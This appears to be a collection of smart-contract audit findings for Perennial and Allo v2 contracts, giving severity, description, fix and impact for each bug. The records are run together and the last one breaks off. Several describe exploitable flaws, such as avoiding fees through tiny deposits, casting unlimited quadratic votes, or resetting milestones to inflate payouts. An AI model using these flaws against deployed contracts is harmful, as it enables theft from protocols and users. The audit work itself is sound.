`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n
Initialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\n
All `MultiInvoker` liquidation actions will revert if trying to liquidate users without positions which can be settled, which can happen in 2 cases:\\nLiquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (price has changed and user is liquidated without doing any actions) and we can reasonably expect that this will be the case for at least 50% of liquidations (probably more, like 80-90%).\\nLiquidated user does have pending positions, but no pending position is ready to be settled yet. For example, if liquidator commits unrequested oracle version which liquidates user, even if the user already has pending position (but which is not yet ready to be settled).\\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to liquidator (revert instead of getting liquidation fee), I believe this should be High severity.
```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n
MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versions
medium
`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set `latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n
Both `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\n
If there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.
```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n
Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current position
medium
`StrategyLib._loadContext` for the market loads `currentPosition` as:\\n```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n\\nHowever, this is unadjusted position, so its value is incorrect if invalid oracle version happens while this position is pending.\\nLater on, when calculating minimum and maxmium positions enforced by the vault in the market, they're calculated in _positionLimit:\\n```\\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\\n return (\\n // minimum position size before crossing the net position\\n context.currentAccountPosition.maker.sub(\\n context.currentPosition.maker\\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\\n .min(context.currentAccountPosition.maker)\\n .min(context.closable)\\n ),\\n // maximum position size before crossing the maker limit\\n context.currentAccountPosition.maker.add(\\n context.riskParameter.makerLimit\\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\\n )\\n );\\n}\\n```\\n\\nAnd the target maker size for the market is set in allocate:\\n```\\n(targets[marketId].collateral, targets[marketId].position) = (\\n Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\\n _locals.marketAssets\\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\\n .min(_locals.maxPosition)\\n .max(_locals.minPosition)\\n);\\n```\\n\\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, the vault will open too large and risky position, breaking its risk limit and possibly getting liquidated, especially if it happens during high volatility.
Adjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\n
If invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.
```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n
`QVSimpleStrategy` never updates `allocator.voiceCredits`.
high
```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.
Updates `allocator.voiceCredits` in `QVSimpleStrategy._allocate`.\\n```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n// Add the line below\\n allocator.voiceCredits // Add the line below\\n= voiceCreditsToAllocate;\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n
Every allocator has an unlimited number of votes.
```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n
`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`
high
```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n\\n```\\n function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n // Get the column index and current row\\n (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n // Get the status from the 'currentRow' shifting by the 'colIndex'\\n status = uint8((currentRow colIndex) & 15);\\n\\n // Return the status\\n return status;\\n }\\n```\\n\\n```\\n function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n }\\n```\\n\\n```\\n /// @notice The total number of recipients.\\n uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient calls `registerRecipient`\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error makes the pool can only record the first application.
Make the counter start from 1. There are two methods to fix the issue.\\n\\n```\\n /// @notice The total number of recipients.\\n// Add the line below\\n uint256 public recipientsCounter;\\n// Remove the line below\\n uint256 public recipientsCounter;\\n```\\n\\n\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n// Add the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter // Add the line below\\n 1;\\n// Remove the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter// Add the line below\\n// Add the line below\\n;\\n …\\n }\\n```\\n
null
```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n
`Registry.sol` generate clone `Anchor.sol` never work. Profile owner cannot use their `Anchor` wallet
high
Add this test to `Registry.t.sol` test file to reproduce the issue.\\n```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log("registry address: %s", address(registry()));\\n console.log("anchor address: %s", profile.anchor);\\n console.log("anchor.registry: %s", address(_anchor.registry()));\\n\\n emit log_named_bytes32("profile.id", profile.id);\\n emit log_named_bytes32("anchor.profile.id", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,"wrong anchor registry");\\n }\\n```\\n\\nWhat happen with `Anchor.sol` is it expect `msg.sender` is `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during `CREATE3` operation.\\n```\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);//@audit H Registry address here is not Registry. msg.sender is a proxy contract. Create3 deploy 2 contract. one is proxy. other is actual bytecode.\\n profileId = _profileId;\\n }\\n```\\n\\nThis can be seen with Solady comment for proxy contract. `msg.sender` above is middleman proxy contract. Not `Registry` contract. Solady generate 2 contract during CREATE3 operation. One is proxy contract. Second is actual bytecode.
Move `msg.sender` into constructor parameter\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n // Use CREATE3 to deploy the anchor contract\\n anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n constructor(bytes32 _profileId, address _registry) {\\n registry = Registry(_registry);\\n profileId = _profileId;\\n }\\n```\\n
`Anchor.execute()` function will not work because `registry` address point to empty proxy contract and not actual `Registry` so all call will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owner cannot use their wallet `Anchor`. All funds send to this `Anchor` contract will be lost forever.
```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log("registry address: %s", address(registry()));\\n console.log("anchor address: %s", profile.anchor);\\n console.log("anchor.registry: %s", address(_anchor.registry()));\\n\\n emit log_named_bytes32("profile.id", profile.id);\\n emit log_named_bytes32("anchor.profile.id", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,"wrong anchor registry");\\n }\\n```\\n
`fundPool` does not work with fee-on-transfer token
medium
In `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.
Use the change in `_token` balance as the parameter for `increasePoolAmount`.
`fundPool` does not work with fee-on-transfer token
```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n
Exponential Inflation of Voice Credits in Quadratic Voting Strategy
medium
In the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n\\nWe can see that at the end :\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each time
Code should be modified to only add the new voice credits to the recipient's tally. The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\n
Exponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy( if one recipient receive 15 votes in one vote and another one receive 5 votes 3 times, the second one will have 20 votes and the first one 15) Over time, this could allow for manipulation and loss of trust in the voting mechanism and the percentage of amount received by recipients as long as allocations are used to calculate the match amount they will receive from the pool amount.
```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n
RFPSimpleStrategy milestones can be set multiple times
medium
The `setMilestones` function in `RFPSimpleStrategy` contract checks if `MILESTONES_ALREADY_SET` or not by `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until this time will always be equal to 0.
Fix condition if milestones should only be set once.\\n```\\nif (milestones.length > 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nOr allow milestones to be reset while they are not in use.\\n```\\nif (milestones.length > 0) {\\n if (milestones[0].milestoneStatus != Status.None) revert MILESTONES_ALREADY_IN_USE();\\n delete milestones;\\n}\\n```\\n
It can accidentally break the pool state or be used with malicious intentions.\\nTwo managers accidentally set the same milestones. Milestones are duplicated and can't be reset, the pool needs to be recreated.\\nThe manager, in cahoots with the recipient, sets milestones one by one, thereby bypassing `totalAmountPercentage` check and increasing the payout amount.
```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n
Allo#_fundPool
medium
Let's see the code of the `_fundPool` function:\\n```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n\\nThe `feeAmount` is calculated as follows:\\n```\\nfeeAmount = (_amount * percentFee) / getFeeDenominator();\\n```\\n\\nwhere `getFeeDenominator` returns `1e18` and `percentFee` is represented like that: `1e18` = 100%, 1e17 = 10%, 1e16 = 1%, 1e15 = 0.1% (from the comments when declaring the variable).\\nLet's say the pool uses a token like GeminiUSD which is a token with 300M+ market cap, so it's widely used, and `percentFee` == 1e15 (0.1%)\\nA user could circumvent the fee by depositing a relatively small amount. In our example, he can deposit 9 GeminiUSD. In that case, the calculation will be: `feeAmount = (_amount * percentFee) / getFeeDenominator() = (9e2 * 1e15) / 1e18 = 9e17/1e18 = 9/10 = 0;`\\nSo the user ends up paying no fee. There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.
Add a `minFundAmount` variable and check for it when funding a pool.
The protocol doesn't collect fees from pools with low decimal tokens.
```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n
The `RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created using the `useRegistryAnchor=true` causing that nobody can register to the pool
medium
The `RFPSimpleStrategy` strategies can be created using the `useRegistryAnchor` which indicates whether to use the registry anchor or not. If the pool is created using the `useRegistryAnchor=true` the RFPSimpleStrategy._registerRecipient() will be reverted by RECIPIENT_ERROR. The problem is that when `useRegistryAnchor` is true, the variable recipientAddress is not collected so the function will revert by the RECIPIENT_ERROR.\\nI created a test where the strategy is created using the `userRegistryAnchor=true` then the `registerRecipient()` will be reverted by the `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test "test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), 